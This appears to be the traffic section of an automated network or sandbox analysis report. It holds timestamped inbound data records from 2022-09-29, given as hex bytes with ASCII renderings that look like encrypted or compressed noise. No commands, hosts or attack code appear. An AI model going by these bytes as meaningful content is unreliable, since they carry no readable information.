                                                                                                                                                2022-09-29 12:51:24 UTC1438INData Raw: cb 1b b9 92 36 01 ea d0 20 83 28 5a 2c 07 0b b5 dc e0 0c 1c 5b 0e 43 02 5e fc 8b ee 47 48 6b 4c 13 8e 75 df 17 f4 46 08 c6 fa 35 a9 dc 14 57 a0 6f 0b 70 70 1c 0d fa 6f f5 1a f3 c7 2e 95 0c d8 26 ed e4 74 e5 3b ed 58 0a 68 d9 5c 51 41 88 9a b2 5c 47 b4 9b de 53 d6 7b 59 90 08 0e 41 14 1e 6a 51 b8 f3 d4 71 f2 0e 82 de ed 25 af 96 ad 8b 2d 8f 2b 5d 28 2b 44 e7 e5 e1 8e 7c b5 b2 76 4c 75 98 24 0a d3 b1 95 bf d6 9f ad 2c af 8d bb f3 e8 5a d3 36 6b d0 30 f1 ab 94 5f 03 ec 06 50 d5 c5 16 4c b0 c2 80 60 62 93 b5 b9 3a c7 91 e2 96 99 6b 7e 05 74 cc 74 78 ed 17 4f 96 29 9c 09 ea bf 37 33 6a 48 5b a9 f5 0e 92 d0 47 62 73 2f 22 26 b1 cd 55 94 f4 b9 90 c8 86 67 07 4d cd aa e7 b3 a0 78 c7 70 02 dc b9 ee 33 a7 3d 05 6c ce 6e 55 f0 a5 5c 8d 6d 07 26 b6 86 2b 3b 8c 90 f4
                                                                                                                                                Data Ascii: 6 (Z,[C^GHkLuF5Woppo.&t;Xh\QA\GS{YAjQq%-+](+D|vLu$,Z6k0_PL`b:k~ttxO)73jH[Gbs/"&UgMxp3=lnU\m&+;
                                                                                                                                                2022-09-29 12:51:24 UTC1454INData Raw: d2 c6 19 0a 60 a9 fb ad 6f d1 95 73 cb d0 df 53 b8 dc 9a 3f ab 90 7f cd 93 1b da e7 44 06 25 ee 78 d4 19 05 bb 67 a7 a8 79 42 89 6e 50 0a 74 27 4e ed 2a 73 64 ec 32 29 4a c4 f4 aa 86 c5 4f 1a 13 a4 f4 fa b4 87 10 0a ac be 3c 62 0b 1b 7e 59 86 65 aa ba 09 bb 41 73 c8 ed c4 87 81 59 37 67 27 66 bd b7 a8 e8 67 ee 5a 98 36 94 de f1 33 fb 58 3b f6 5e ef c2 0a 9c 0a e3 ee 24 eb 6b ad c3 a5 2f 63 da 75 e1 e0 92 15 61 76 a4 5e 55 21 75 eb 6c f7 f5 43 ca d6 37 7e 95 fe 5a 7d 48 5b 7f b6 05 18 e9 79 ff a7 3b 0f 4f 85 21 8b 59 20 1b 24 22 2c c3 df 11 33 bb 46 c4 c0 8d 03 67 34 34 be a4 3a a6 a9 9f 2e f2 24 45 ca 9a f5 fa 80 cc 16 2e e3 7b 44 56 0a f2 00 bd cb c7 8a 85 a5 dc f0 bd 3b 61 ef ac fb 66 73 26 a2 a4 56 71 94 1e f4 73 09 ab 6b 74 20 3c fd d9 1e f3 fc 1f 1c
                                                                                                                                                Data Ascii: `osS?D%xgyBnPt'N*sd2)JO<b~YeAsY7g'fgZ63X;^$k/cuav^U!ulC7~Z}H[y;O!Y $",3Fg44:.$E.{DV;afs&Vqskt <
                                                                                                                                                2022-09-29 12:51:24 UTC1470INData Raw: d5 1a 09 8e fc 2a 6a 33 fd 77 ba 31 86 2a d6 c5 49 44 f9 32 25 3a e6 25 6f 12 a3 ca 08 98 df 83 1b c9 f9 02 34 b2 f8 c6 d4 27 28 59 9c ca 06 7f e6 94 1b 33 89 d6 7f a9 db 86 78 01 12 67 50 c4 62 84 04 73 33 c7 80 55 a8 0b a3 59 a6 34 3b 0a 35 2c 4a 36 ce 00 b7 84 b1 c4 2c 77 72 d7 14 20 25 7a 6f af 07 8d b7 df 7a 89 29 1e aa ed 37 bc b2 53 a2 c3 35 08 59 88 ee f7 21 8e 7f fa 3a 54 ab 8a ca c3 12 8d 9b ed 8b dc 66 59 55 07 42 c1 78 aa 9f ee f6 d6 9c 7a f6 76 3d bf 39 bd 8a 61 fe 2e 02 04 4e 97 13 17 66 ba e4 1d c7 f9 59 16 57 b7 69 67 f4 e7 59 96 c6 8d d4 cb 02 11 c0 22 5e bb 47 24 82 66 10 32 a0 f2 1a 1f db 2d f7 2d d5 66 87 08 69 eb 4b 01 0a 5e 20 22 d4 04 23 b8 ca cd 6c b3 f8 6f 09 46 82 41 b8 eb 29 b5 9c 83 b6 1e 32 3a c0 5f b4 cb 4d 27 1e a8 03 73 22
                                                                                                                                                Data Ascii: *j3w1*ID2%:%o4'(Y3xgPbs3UY4;5,J6,wr %zoz)7S5Y!:TfYUBxzv=9a.NfYWigY"^G$f2--fiK^ "#loFA)2:_M's"
                                                                                                                                                2022-09-29 12:51:24 UTC1486INData Raw: a5 74 d3 87 33 2c b6 f5 0d 34 f8 26 8a ee 84 ad f3 38 4f ce 76 65 45 bf 1a 00 12 b4 79 c1 58 4e 5d 76 fa 28 7a 27 fe ed 20 43 eb 72 bf 95 74 de 11 0d 0e 1c e7 f1 96 9a 17 24 a9 a4 db 95 69 11 cb 92 ac 04 0a 28 c6 a6 a1 48 87 de aa 13 fd fd 2d c8 4c 34 91 4f 09 df d6 c7 f2 2c 4d ce 57 9a 0d 5c 17 1b 64 d5 1e 26 92 a4 ca d4 c7 e0 0c c5 c5 8f f8 92 3a a1 88 26 25 3c be ff e2 18 f5 fd d4 34 51 6d 2a e6 22 7d bc 12 76 31 06 54 73 0d 6e 86 c3 1d a3 fe fb 6f 3e a9 d1 c5 00 44 96 03 db be 40 eb 4d 4a fe 56 27 33 9b 2c 05 b7 69 09 b4 ee bf 90 1f ee e5 8e 79 7b 1d 22 58 5d b3 04 52 7a 79 8f e2 fb 23 0d b1 83 e0 2e 37 c2 aa 2a c3 62 c3 7d d9 67 f4 cd 7e 42 ad 4d 79 35 2e b3 ed f4 6e 01 c7 2a 23 1a 6e f5 7f f8 d6 c4 66 3b 71 7d b2 b5 42 92 0c b3 8f 30 63 84 a0 a8 81
                                                                                                                                                Data Ascii: t3,4&8OveEyXN]v(z' Crt$i(H-L4O,MW\d&:&%<4Qm*"}v1Tsno>D@MJV'3,iy{"X]Rzy#.7*b}g~BMy5.n*#nf;q}B0c
                                                                                                                                                2022-09-29 12:51:24 UTC1502INData Raw: 6a 4e 66 b7 4f 25 dc bb 3a 66 53 cd ee d4 a3 b8 ff 93 a5 84 aa a7 ea 28 58 7a f0 0b 56 4c d9 fc 40 6c 6e a5 1a 9c 9e f8 66 e5 24 62 b7 63 dc db 89 d4 48 f1 22 c6 10 c7 fb 60 e0 1e cc 98 89 dd ea 34 aa 0c 88 e2 19 28 77 85 e4 4f 1f 9d 11 f0 66 70 5c 5d ec d4 89 94 7b 5f e5 b0 58 82 a1 01 c0 cb 8c 2d aa f1 c9 19 24 32 5a 93 d3 48 25 e4 6c 61 2f 4a e1 a0 d3 7d 28 64 eb bf eb 78 81 fa 22 11 70 46 02 78 a4 2d df ba 5e cd 85 60 84 43 1b 6e 0a f4 6f 04 5d c9 f6 23 84 18 fb 04 ab 19 b2 12 81 4e 17 3d ca d9 62 f6 7a 25 52 4c 09 33 c3 4b 63 90 90 75 6d 83 4d 80 4f b3 99 10 41 93 b7 38 b8 5e e1 4e 48 d8 9c 40 ae 5e a6 af 0b 0b a4 d2 66 0b d5 d8 97 bc dc 10 5d a8 bb 6a 4c 36 62 22 48 f4 e0 c4 bf 9a 54 4e 81 40 6c 1a d5 7b 66 0d ef 73 30 7c 16 ad 0e 7b 5c 25 13 ba 63
                                                                                                                                                Data Ascii: jNfO%:fS(XzVL@lnf$bcH"`4(wOfp\]{_X-$2ZH%la/J}(dx"pFx-^`Cno]#N=bz%RL3KcumMOA8^NH@^f]jL6b"HTN@l{fs0|{\%c
                                                                                                                                                2022-09-29 12:51:24 UTC1518INData Raw: 9c 99 2e 42 a9 85 fd ff fe eb 5a e5 e9 bb 8b 12 d8 28 e8 28 59 55 31 10 0f a4 fe 99 70 fc 5f 92 17 cf 2a 82 56 e8 92 da 85 22 62 fd be 05 7f 89 0b cb 1b 80 79 da 09 77 6a c4 80 46 c3 78 46 b2 75 3d ec 0f de 63 74 ea 61 cb 9f 00 0b 3b c0 f7 eb ee 98 d6 8d fd d8 6a a8 12 20 62 85 65 ad c1 83 3d e1 21 73 db f5 4e 6f f2 48 35 7c 49 e3 62 bf c1 ff 2d 15 72 c4 9e 0e 4d 26 ba 1e d7 73 35 a8 ed 40 71 f3 2a 60 84 21 7c bd ef ec f0 b7 60 6a 7d 8e a1 95 06 08 54 d3 cf 31 ad d0 5e a2 1b 60 fd 85 93 62 05 e4 d2 80 8b 02 7c 11 05 7a fa d4 85 cb 37 69 cf 4e 21 2b 06 06 86 a2 22 07 e0 6e b5 5e af 1b 18 09 96 15 e2 bf ea 69 b3 1a ce 02 58 46 58 9e f5 b1 4e df 4c 22 c8 18 0d 84 27 9f ef ca 83 33 9f fd 98 59 8f fd d5 7e c7 1d e0 9c b2 5b 19 b6 4a bc e7 d6 67 51 c4 7b cd 0e
                                                                                                                                                Data Ascii: .BZ((YU1p_*V"bywjFxFu=cta;j be=!sNoH5|Ib-rM&s5@q*`!|`j}T1^`b|z7iN!+"n^iXFXNL"'3Y~[JgQ{
                                                                                                                                                2022-09-29 12:51:24 UTC1534INData Raw: 7c 5d bc 8b c2 bc f4 f8 bd 27 db 99 55 1f 12 1b 57 d4 cc 92 56 6b 9e aa 91 31 0c 99 9c 80 7d 6b e9 17 61 e3 23 02 5c e0 7e be 11 e5 e2 aa 81 d7 06 e4 e5 11 05 86 e8 c7 0f 8a e6 82 53 cc 5a e0 0b ee c5 bd 79 db 7b 80 b8 d1 1c 4c 16 bf f6 5f c5 6f 6e f7 e0 99 11 53 42 3b 72 99 a0 32 f2 52 62 a1 f9 d8 35 76 fd 18 09 c9 61 f8 31 96 4a 30 1c 73 34 9a 9d c1 e0 a9 82 79 6f 9a c5 44 8f 21 f9 a6 bb d2 b0 82 c7 64 7d e9 26 6d 45 af 96 a3 06 1c c2 26 b3 8f af 5e 11 cb 62 1c f6 2e 90 ce cd be 1e 6b 06 34 22 b9 21 51 5f 4b dd e5 0b 38 9b 29 73 a3 42 de 77 a1 27 aa 47 45 66 b8 b2 b1 a9 29 dd c4 f5 db 35 48 01 84 48 6e d1 8c ab 61 81 9d 10 d2 94 95 ba 0f 08 cd e0 82 b1 a4 74 ad 0e 19 bb 67 cc fc 75 98 2e fe 5a b2 c6 cd f7 f4 8d 27 b1 fe 5e b1 a1 4c 2c fb 20 4d 57 e0 98
                                                                                                                                                Data Ascii: |]'UWVk1}ka#\~SZy{L_onSB;r2Rb5va1J0s4yoD!d}&mE&^b.k4"!Q_K8)sBw'GEf)5HHnatgu.Z'^L, MW
                                                                                                                                                2022-09-29 12:51:24 UTC1550INData Raw: ab df 93 5b 6b 32 92 cf d9 42 65 fa 5e 16 50 40 b7 1b 63 b1 be d3 d3 53 6f 25 00 2c 0c 2c 91 d8 4a 21 38 df d7 27 1a a5 3e 91 a4 3c e5 ef 9d 2a c1 aa 5a ce 22 e6 05 6a 08 ca ee 67 c0 75 e3 8b 23 2e c1 e6 dd bc da 35 d3 93 c2 62 ef 45 11 b1 e0 8a fa 2f 4a ca cc 80 30 c6 df 69 d3 1d 76 4e 99 05 82 45 a6 cc fb 52 cf bd f4 56 b0 40 15 71 96 41 59 c7 a9 bf 8f e5 4f 62 dc 0f 6a 3d 22 55 04 ad 04 ad a3 ff f5 a1 e6 f7 63 86 9f 05 a5 bd bd 71 37 db 6b f1 83 89 27 22 52 13 c8 36 02 46 a2 01 b9 38 b6 78 c2 6c 7f 87 f5 f4 18 ca 6e 2f 98 2e 8a d0 b8 1c 03 06 92 1f b1 a7 42 00 cf 9f 9a 1d 27 63 ac 73 1d d8 10 49 83 8a 4d a5 84 64 b8 0f d2 7c fd ce 64 d9 8c de 76 df 97 18 3a b9 1c e6 58 98 39 46 9d 2e d9 eb 71 40 23 8a 1d 04 e9 79 6c 48 26 74 69 ba c8 5b ed 58 28 1d 27
                                                                                                                                                Data Ascii: [k2Be^P@cSo%,,J!8'><*Z"jgu#.5bE/J0ivNERV@qAYObj="Ucq7k'"R6F8xln/.B'csIMd|dv:X9F.q@#ylH&ti[X('
                                                                                                                                                2022-09-29 12:51:24 UTC1566INData Raw: 61 cf 88 c6 bd 8e 42 fd dd 45 27 6e 1a 0f 0f 79 d6 ea 71 6c fb 7a 2f 5f 61 d3 19 2c bf a7 78 30 15 22 64 19 77 c8 81 a2 5c bc 57 06 a1 63 fb 6d 47 05 11 ca ed 0d aa e4 8c 22 ba ee 8a 90 fa 95 4f a8 44 5f 1f 61 1a 99 26 cc ab 12 ef 49 90 f3 be 0c e7 5b a6 19 90 da 07 77 14 3a 5a 4b 9a ab 8b 08 9d b2 35 92 19 74 7a ce 3f 05 0d 50 1d 3b 7d c3 b0 8f df d4 d5 76 f8 5b b6 b3 6f 58 02 81 a2 b7 e8 ae 53 99 f2 51 4d 01 b4 17 6f 78 ef a6 ea f6 a4 55 be 64 4f 23 6d 9d 71 ba 19 39 ca e4 31 6a 99 63 d1 3d 48 c2 db c0 67 0c e8 57 50 bf 0d 2e 24 22 d1 c0 69 01 cc 72 62 30 36 31 eb 1c eb 61 bc df 83 09 20 b9 55 02 16 ab 7c 81 56 1b 8d 3e cb a8 89 2d f2 78 32 4f d3 c3 23 8c 9e 32 52 ee fd 43 4c 45 23 60 80 16 18 71 d6 25 4c 3d ff 2a 66 46 78 dc 93 0e 34 41 06 17 01 14 84
                                                                                                                                                Data Ascii: aBE'nyqlz/_a,x0"dw\WcmG"OD_a&I[w:ZK5tz?P;}v[oXSQMoxUdO#mq91jc=HgWP.$"irb061a U|V>-x2O#2RCLE#`q%L=*fFx4A
                                                                                                                                                2022-09-29 12:51:24 UTC1582INData Raw: 0e e7 1c e7 30 fb 34 8d d1 da 69 cf 55 43 74 58 b0 c5 40 40 43 ea a9 cd 73 0d 1b 75 61 92 fe fc e5 c2 1f 7a 52 63 38 d0 9c 5c 69 d8 8a a2 fd 22 e8 6a d5 20 7b 4e d8 bc 8c ce 4f 8a 9a c0 c4 5f f0 21 79 7f 08 0d b5 a3 87 85 2e 63 3e 83 dc 8b 63 f3 10 d3 60 b9 7c 11 ca 51 c0 67 9e 51 5a 26 44 10 9d 4c 0e d9 97 64 3d 42 64 ad aa 36 0b 2d 59 d0 a0 fb 77 ca c2 06 00 85 d7 0b 28 61 2f 89 75 6b 38 d7 39 e0 cc 19 43 4c e8 aa 99 87 a5 75 09 ba af 84 e5 44 5f f9 e9 e5 19 bb 46 00 f5 b1 0d 28 06 a7 15 31 87 66 38 66 0e ab 0d 02 8d 9e bc a5 73 09 80 62 2b 88 f8 96 92 d1 aa b1 47 38 47 28 da 3a 7f 8b 8a b5 df 87 11 03 ae e6 73 44 a2 7d 52 e2 58 1a 7a 6f e7 29 82 b9 d8 e5 85 e4 ec 1a 90 70 53 55 6a 32 05 0c da 04 78 12 46 74 c7 5a 7b 74 70 7d 25 9a f2 fe ad a3 bd dc 52
                                                                                                                                                Data Ascii: 04iUCtX@@CsuazRc8\i"j {NO_!y.c>c`|QgQZ&DLd=Bd6-Yw(a/uk89CLuD_F(1f8fsb+G8G(:sD}RXzo)pSUj2xFtZ{tp}%R
                                                                                                                                                2022-09-29 12:51:24 UTC1598INData Raw: b4 4d 20 c8 52 76 6d 2f 5b e8 eb f3 86 83 d4 af 29 93 1a cc 82 8b 14 80 14 5c ef 9d 9c 58 fa 15 70 3c 78 36 71 a7 07 47 65 55 7c 78 67 e0 b0 9d f4 29 47 c0 79 9f 4d 41 cf 98 d5 12 ef 4b 19 4d 6b 2b fe 3b 26 00 98 8a 04 9c 36 0d fb 1b a2 6f 92 79 52 4c 91 dd a6 22 1c 95 2f d8 8d 61 6f de 2d 89 22 ee 0d 2a 9a e4 de b2 5b f5 fd 93 18 33 34 c6 41 30 79 b1 44 e7 26 a3 e6 00 3c af ee e6 af 33 21 25 4d 29 76 47 bf 02 24 e9 98 f3 ca 90 82 1a 2b a2 7c 1e 10 31 ab 4b 89 59 b3 3d b1 ee 66 bf 22 ed 33 08 22 64 7a 52 26 5d 33 57 04 c1 52 5c b8 21 88 fb ae e0 07 0f 0f 59 0e 87 4e b0 84 5a 4f 21 9c 72 99 a2 a6 dd 77 e8 21 0e 96 f7 e0 dc c1 93 4d ae 45 33 f5 c5 62 0e d4 22 7d 51 93 06 74 b2 90 11 5e a6 8f 48 cd 8e 76 8f 1c 82 8d 54 7d a8 9c 2e 55 47 03 fc 3d 4c a0 03 f4
                                                                                                                                                Data Ascii: M Rvm/[)\Xp<x6qGeU|xg)GyMAKMk+;&6oyRL"/ao-"*[34A0yD&<3!%M)vG$+|1KY=f"3"dzR&]3WR\!YNZO!rw!ME3b"}Qt^HvT}.UG=L
                                                                                                                                                2022-09-29 12:51:24 UTC1614INData Raw: ff d8 b0 ba f9 a7 1e a2 79 4d 85 47 6d 74 fc ff c1 25 39 cd 3f 2d 13 04 0c 18 e0 e2 85 3a 8f ac fc 04 ce 31 3c 5f 6c e2 61 a7 69 b2 41 d2 e6 69 e8 52 b6 5e 06 b5 a8 3d 3d 5c 2e ad 16 26 dc 34 ca ed 35 0e 2e d5 a8 34 a7 15 c8 5e e3 d7 2a 87 d4 60 bf ae 1f b3 1e b4 5a bd 4b 24 fb 83 11 98 75 91 46 ba 1b 25 ab bd b9 6b b0 71 58 54 59 51 b8 65 4c 42 1c 8c 00 5b ef eb 36 1c a9 0d e8 65 ef 21 d5 b9 4c 55 90 9f 00 6d 57 12 40 f2 d7 a2 14 a0 0a ab 9c 5e 82 0d 9b ca cd 8f 3e b8 fe 12 9c 27 86 8c 5a e2 33 62 6a 9d 30 67 8b 50 e5 0e 33 e4 da ef 0d e9 73 58 59 cd 68 d3 a7 96 33 8e bc 9d 87 98 fa f3 e7 cd 38 1a f8 44 c6 b4 55 33 e5 b5 b0 e9 ca 8e f0 e5 01 f9 96 50 30 41 3e bd f9 22 8d ca 62 e9 fb db 41 f4 4f 39 d6 25 17 89 11 db 12 47 84 da e8 91 8d 57 e4 ac 15 f1 2d
                                                                                                                                                Data Ascii: yMGmt%9?-:1<_laiAiR^==\.&45.4^*`ZK$uF%kqXTYQeLB[6e!LUmW@^>'Z3bj0gP3sXYh38DU3P0A>"bAO9%GW-
                                                                                                                                                2022-09-29 12:51:24 UTC1630INData Raw: 0e ad e7 c1 76 8f d4 b8 83 00 76 fd fc 74 99 63 f4 b1 b9 71 73 d8 2e ac 63 99 9d 5f 6a 30 5b 45 66 b9 dd e8 1e 04 14 6b a2 22 8f b6 ac ef ee 58 4b fd 48 7c 88 21 73 42 96 46 a1 e8 0d f5 36 b8 72 58 a3 3b 09 e3 8b 06 02 c6 24 93 6d 5e 3d 97 0c 68 f4 ee ac 29 3a 52 67 09 d4 3e 17 e8 c5 bd 60 db 5d ae da ba 2b 9f 22 8b 8c 2d e5 0e 7c 19 81 bd 6a c4 60 d2 0b 35 94 10 de 25 c5 6c 0b 12 15 d5 0d a4 a9 83 12 12 d2 2f 12 43 bf c7 6b a2 ad 5f 17 e2 ff 34 2c 3e 3f c1 ef f8 19 51 eb a8 88 b9 fb 0d 33 cf 1f 90 c3 0e f9 4a d8 2b 46 23 71 1e c9 a2 c7 e0 80 07 ac 29 35 0b 85 59 eb 46 f1 71 ff 54 4e 98 16 5b e6 76 9f 50 19 16 dc 67 a8 50 98 6f 42 35 a3 50 73 ec c8 2c 20 af 12 e3 b8 49 2b 34 c8 13 3d ad 49 9f 3c 95 42 d2 da 4c ae 7b fb a1 b4 8e 96 d8 42 b0 31 82 68 b5 f8
                                                                                                                                                Data Ascii: vvtcqs.c_j0[Efk"XKH|!sBF6rX;$m^=h):Rg>`]+"-|j`5%l/Ck_4,>?Q3J+F#q)5YFqTN[vPgPoB5Ps, I+4=I<BL{B1h
                                                                                                                                                2022-09-29 12:51:24 UTC1646INData Raw: 44 99 d5 cc 94 3c cb 37 e1 55 f1 c1 71 db 38 30 86 99 90 75 07 da 85 d5 27 7d b9 5a e8 0a 55 2c ed 56 03 3c c5 fa 09 49 ad b0 e3 a5 fd 90 77 4c f7 0f f8 95 08 de e9 60 52 24 f8 a9 bc b6 c5 3e d2 e1 f6 f1 e5 1e 85 3d fb 93 15 4f 9f 9d 44 e7 30 87 0b ea 48 21 06 ad b6 b4 01 d0 cb 5b b0 ed 33 68 a3 60 88 33 c5 78 10 e8 e9 61 e4 06 ac 0f 87 56 0c 8b 8f 06 c6 78 91 3d 8c cb 8c 52 8b c9 dd 09 ab 12 6a b7 31 8c d9 02 95 16 d8 ee 18 c5 fc dc 9e f5 c9 a4 34 7d da 89 ac 8b 35 12 4f 07 fa ec 6f 6f f1 49 34 41 37 bf 91 a5 e3 01 cc 8c c7 a8 fc 79 ec 4f 49 35 1c 1e ab 88 20 6d 25 35 42 a7 2d 4f de 01 3a a8 2f dd 81 81 60 e6 e8 31 cf d3 52 7e 33 6c c2 74 42 af af 20 65 d7 86 52 e4 10 9a af c4 15 40 fe 32 dd df ef 05 f0 1f 76 e5 e0 06 65 91 bd 92 4c 1c 4b 28 18 2e 7b c4
                                                                                                                                                Data Ascii: D<7Uq80u'}ZU,V<IwL`R$>=OD0H![3h`3xaVx=Rj14}5OooI4A7yOI5 m%5B-O:/`1R~3ltB eR@2veLK(.{
                                                                                                                                                2022-09-29 12:51:24 UTC1662INData Raw: 2e 41 be 56 9b 42 d5 40 35 30 a0 1a 55 29 12 dd 6b ed f5 3c f1 07 7b ae 52 c4 99 23 c5 4d 35 75 bf 7c 7b 82 b9 59 02 ba c2 81 70 96 2a 94 22 e8 09 26 1d 31 a1 f5 6f b6 00 15 71 00 6c 10 af 78 8d 72 6b fe 4c 73 4b b5 32 fa a5 20 02 aa 15 f9 4d a4 f5 fa 8d e3 b8 4d ca 79 97 04 9e f6 71 22 94 6f c8 56 ee b6 ee 12 51 2c 27 81 f2 c8 b1 73 24 77 a7 63 a0 af 09 0a e6 e7 0a d2 02 aa bb 8e 28 ce 83 aa 51 16 44 b3 d9 a5 89 41 ca ae 7c 91 83 00 ba 98 fd 46 d5 fb a3 83 bb 09 02 19 1d a7 07 33 35 87 32 77 2e 69 a8 ab ef 98 8b b6 00 16 39 1f 20 6c 11 b3 aa 11 e1 ff 23 a9 02 6b e6 ca 00 37 65 1b 56 ad 39 26 5a eb a3 18 b2 01 ae 25 88 9a 2d 77 af 82 ef 48 92 2a 53 2e 7c c7 6d e4 63 b6 7e 29 52 e1 42 19 c3 16 e5 44 a2 b4 23 f9 9b 0b 28 64 2f 46 5d 87 2b 5c 49 24 fe 06 2d
                                                                                                                                                Data Ascii: .AVB@50U)k<{R#M5u|{Yp*"&1oqlxrkLsK2 MMyq"oVQ,'s$wc(QDA|F352w.i9 l#k7eV9&Z%-wH*S.|mc~)RBD#(d/F]+\I$-
                                                                                                                                                2022-09-29 12:51:24 UTC1678INData Raw: 60 b7 5b a4 fa ed 21 fb af a8 30 ce 4c 7c 5b bf de 10 91 92 78 f1 33 c6 6f 12 d3 5a 2c 68 e6 06 39 92 d6 01 e5 81 40 c5 c3 9b 61 2c bc ed 27 ab bc 2b 94 44 51 88 a6 64 0f de d8 1c 6c e4 3f 64 de a7 a0 ab d4 f5 38 03 b5 93 53 c1 6f 5a 1f 28 42 70 a1 11 87 6d 9f c5 89 f2 c7 26 82 c9 25 cc c9 bf ac df cc 81 b6 42 9b 33 dc 7f c7 1d 26 2f c0 c8 a0 4c b8 ca 9f b0 5f 02 65 e5 52 ad dc 2e 67 08 75 77 bd b3 6e a4 7e aa a3 18 78 b3 7d b7 ad ed a8 5b bb e2 d1 39 ca a2 e2 fa a0 2b 45 e6 36 3b ec e8 79 81 c6 9a 72 a7 8a 82 ab 6a 37 97 c9 68 e6 b8 cc 49 64 b5 6c a7 9e 0a bb 37 6d b1 d8 cf 4c 22 24 96 be 11 d3 4e 74 bc 3a 4b ab 1a 1b 77 7b db 73 68 01 e6 de 5b ad 5e 74 55 e2 64 b1 75 82 e0 02 fc 9f b0 e5 0b 12 f6 da 68 51 db a6 ce 8d d8 ef e3 c0 00 56 30 dd 55 72 de de
                                                                                                                                                Data Ascii: `[!0L|[x3oZ,h9@a,'+DQdl?d8SoZ(Bpm&%B3&/L_eR.guwn~x}[9+E6;yrj7hIdl7mL"$Nt:Kw{sh[^tUduhQV0Ur
                                                                                                                                                2022-09-29 12:51:24 UTC1694INData Raw: a6 e7 7f 88 60 39 3c ee d7 87 37 b8 5c f0 a5 ee 89 15 ba 14 66 07 07 77 ce 19 b1 83 2f 4c 7e 52 9f f8 78 d8 18 14 76 af 30 c2 35 4e 27 62 7e 5f b6 5d 85 e5 3d c9 83 61 74 a6 22 47 4d 4f 0e e1 61 91 c5 b0 fc 83 2d 40 15 ab 6d 47 b0 b4 0a 2c 8c 0c 32 35 8a 7c b2 84 10 3c 82 ec 45 e4 62 29 1e 2c d4 f2 91 fd 16 1f 9a 39 8b 7c e6 c8 bf 1f 75 3d 6b 6c 97 be 45 06 00 fe 1d 7d cd bc 9c 0c 85 90 d1 f9 69 ec 18 3f 6d 06 11 35 41 8e e1 30 b1 46 cf 74 ba 53 cd f8 49 4f 52 d0 6f b2 2c 2b dd 0b 4c de be 65 18 2c 78 e6 9b a0 e4 f8 9b c1 42 47 fd 30 dd 05 53 c5 d1 a7 96 92 d6 bf 08 bc 1c 11 10 53 53 c7 c0 c6 51 9d c4 d4 a6 ac 96 05 fe 6b 8a d7 5d 9f 65 35 af 2b 33 0d e5 85 37 c9 64 ab cd 76 6f b8 10 a9 73 b7 35 d7 43 4a 6e 95 fe ef 48 0f a8 b7 3a 46 60 e0 2c 8f a9 30 4e
                                                                                                                                                Data Ascii: `9<7\fw/L~Rxv05N'b~_]=at"GMOa-@mG,25|<Eb),9|u=klE}i?m5A0FtSIORo,+Le,xBG0SSSQk]e5+37dvos5CJnH:F`,0N
                                                                                                                                                2022-09-29 12:51:24 UTC1710INData Raw: 2a 5f d5 0b be 19 d8 88 33 28 24 ec 83 09 63 78 69 5f 74 10 5b 95 2f 33 d0 24 bf a1 43 27 21 57 22 19 2f 4a c4 b4 a6 c6 b6 4d a9 e9 b2 fb ab 4f 67 15 36 5e 53 d0 4a ba 77 85 86 e2 14 21 5c 68 f9 e0 2a 8d 4e 34 ec 55 bc 1b 89 56 71 e9 4b 16 64 82 a8 ee 0d 4c 12 95 69 e4 56 6d 1d 87 c3 d7 8b 43 e9 f3 90 cf fb db 25 5c 9c 30 38 cb 77 aa c0 d1 5e f9 07 3b ea b8 5a 1d d7 75 34 ad e3 52 73 fe 0a 7d 3d 44 7a e1 c2 16 8c f6 b1 7c 73 22 7e bc d1 93 1d 49 7c be 27 a8 12 5c 27 4d 20 a5 12 e6 d2 95 9b b6 d3 83 0a 7d f7 7a eb d5 ed 6a d4 71 6d 90 fb 59 2c 49 30 ee 1f 5d 07 0d 48 a4 69 cd 4b bf 7e 0d f2 f7 18 40 5a 2c b1 24 cc 6f ae 23 82 e7 1b 94 34 b0 b1 c3 89 32 c4 05 21 30 b6 05 a2 60 5b 91 92 39 94 b3 59 e5 e7 93 71 70 78 d6 d5 1a 6e f6 a0 29 4e 61 1c af e7 98 cd
                                                                                                                                                Data Ascii: *_3($cxi_t[/3$C'!W"/JMOg6^SJw!\h*N4UVqKdLiVmC%\08w^;Zu4Rs}=Dz|s"~I|'\'M }zjqmY,I0]HiK~@Z,$o#42!0`[9Yqpxn)Na
                                                                                                                                                2022-09-29 12:51:24 UTC1726INData Raw: f4 52 8e 7e 01 dd 6c 81 08 d3 df 38 0c 5d 41 8f b4 13 c8 b9 98 c6 ba ff 64 75 99 5f 5d f7 d8 d0 88 94 88 44 56 69 d6 4d e2 1a fd f2 8d 91 b6 f8 b7 94 9f 90 fe b5 82 51 22 ab 66 b6 85 5e 75 80 7d 26 0a d5 0a 83 b2 07 86 24 d0 27 a2 8c 14 f6 3f 44 09 44 9a 22 6e c6 4a 3d 51 4f 5e bc 3c bd fb 2a 50 ea 96 69 30 85 66 2e 05 44 7b ad 99 b3 90 91 e0 d9 90 6b 98 a2 2b 03 7c 7e c2 a7 53 7d 83 51 e1 5f f8 e8 9e 45 93 89 02 15 72 90 4a ef 19 64 79 60 5c 88 15 34 ea 19 de 9c 8e 3d 37 9a 0c ea ae 8d e2 64 15 61 c6 ef 87 5d 64 6c 08 b4 78 b4 4e 44 c3 d9 ad 29 ba d5 f3 c1 10 20 2c 47 42 48 9c a9 1b 72 0d 7c 90 60 5f 65 cb 12 8d 50 02 a6 c0 09 5b 13 ad 67 7a c4 61 6c 8b 37 4e bb ae 44 06 6a 35 44 e9 7d 99 a1 b9 8f bb a6 16 68 f6 bb e4 a6 78 5a eb 01 43 ee b3 0a c7 41 40
                                                                                                                                                Data Ascii: R~l8]Adu_]DViMQ"f^u}&$'?DD"nJ=QO^<*Pi0f.D{k+|~S}Q_ErJdy`\4=7da]dlxND) ,GBHr|`_eP[gzal7NDj5D}hxZCA@
